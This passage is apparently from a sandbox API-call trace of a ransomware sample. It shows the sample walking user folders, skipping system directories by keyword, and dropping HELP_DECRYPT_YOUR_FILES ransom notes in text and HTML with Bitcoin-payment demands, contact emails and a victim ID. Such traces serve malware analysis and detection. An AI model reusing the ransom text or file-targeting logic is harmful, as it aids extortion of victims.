	[0179.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.882] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="webcache") returned 0x0
	[0179.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.883] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0179.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.883] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0179.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.883] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="packages") returned 0x0
	[0179.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.884] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="cookies") returned 0x0
	[0179.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.884] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="programdata") returned 0x0
	[0179.884] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.884] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.884] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84bd4b91, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.885] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.885] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84bd4b91, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84bd4b91, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84bfade9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.885] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84baecb0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84baecb0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84baecb0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.885] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84baecb0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84baecb0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84baecb0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.885] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.885] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.886] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1
	[0179.886] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1
	[0179.886] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1
	[0179.886] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.886] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.886] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings"
	[0179.886] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings"
	[0179.886] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\"
	[0179.887] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Local Settings\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\"
	[0179.887] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*"
	[0179.887] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*" (normalized: "c:\\users\\default\\local settings\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84baecb0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84baecb0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84baecb0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0179.887] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.887] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings"
	[0179.887] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Local Settings\\*.*") returned="C:\\Users\\Default\\Local Settings\\*.*"
	[0179.888] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.888] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.888] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0179.888] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\local settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.889] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.889] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.903] CloseHandle (hObject=0x380) returned 1
	[0179.904] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.904] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.904] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.905] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.906] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\local settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.906] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.906] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.906] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.906] CloseHandle (hObject=0x380) returned 1
	[0179.907] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.907] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.908] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.908] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0179.908] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\local settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.908] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.908] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.911] CloseHandle (hObject=0x380) returned 1
	[0179.911] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.912] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.912] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.912] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.913] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.914] CreateFileW (lpFileName="C:\\Users\\Default\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\local settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.914] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.914] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.914] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.914] CloseHandle (hObject=0x380) returned 1
	[0179.915] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Local Settings\\*.*" (normalized: "c:\\users\\default\\local settings\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84baecb0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84baecb0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84baecb0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0179.915] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.915] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0179.915] lstrcmpW (lpString1="Music", lpString2="..") returned 1
	[0179.915] lstrcmpW (lpString1="Music", lpString2=".") returned 1
	[0179.915] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.916] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.916] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music"
	[0179.916] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music"
	[0179.916] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\"
	[0179.916] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\"
	[0179.916] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Music\\*.*") returned="C:\\Users\\Default\\Music\\*.*"
	[0179.916] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*.*" (normalized: "c:\\users\\default\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.917] lstrlenW (lpString="C:\\Users\\Default\\Music\\*.*") returned 26
	[0179.917] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.917] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Music\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\default\\music\\*.*") returned 0x1a
	[0179.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.917] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="windows") returned 0x0
	[0179.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.918] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="boot") returned 0x0
	[0179.918] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.918] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0179.918] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.918] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.918] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.919] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="temp") returned 0x0
	[0179.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.919] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="program files") returned 0x0
	[0179.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.919] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.920] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="appdata") returned 0x0
	[0179.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.920] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="application data") returned 0x0
	[0179.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.920] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="winnt") returned 0x0
	[0179.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.921] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="tmp") returned 0x0
	[0179.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.921] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="cache") returned 0x0
	[0179.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.921] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.922] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="webcache") returned 0x0
	[0179.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.922] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0179.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.929] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0179.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.930] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="packages") returned 0x0
	[0179.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.930] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="cookies") returned 0x0
	[0179.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.931] StrStrW (lpFirst="c:\\users\\default\\music\\*.*", lpSrch="programdata") returned 0x0
	[0179.931] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.931] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a0f3e0, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a0f3e0, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a30fc8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.931] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0179.931] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0179.931] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\"
	[0179.931] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0179.932] lstrlenW (lpString="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0179.932] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.932] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x33 | out: lpsz="c:\\users\\default\\music\\help_decrypt_your_files.html") returned 0x33
	[0179.932] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.932] StrStrW (lpFirst="c:\\users\\default\\music\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0179.932] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a0f3e0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.932] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0179.933] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0179.933] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Music\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\"
	[0179.933] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0179.933] lstrlenW (lpString="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0179.933] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.933] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Music\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x32 | out: lpsz="c:\\users\\default\\music\\help_decrypt_your_files.txt") returned 0x32
	[0179.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.934] StrStrW (lpFirst="c:\\users\\default\\music\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
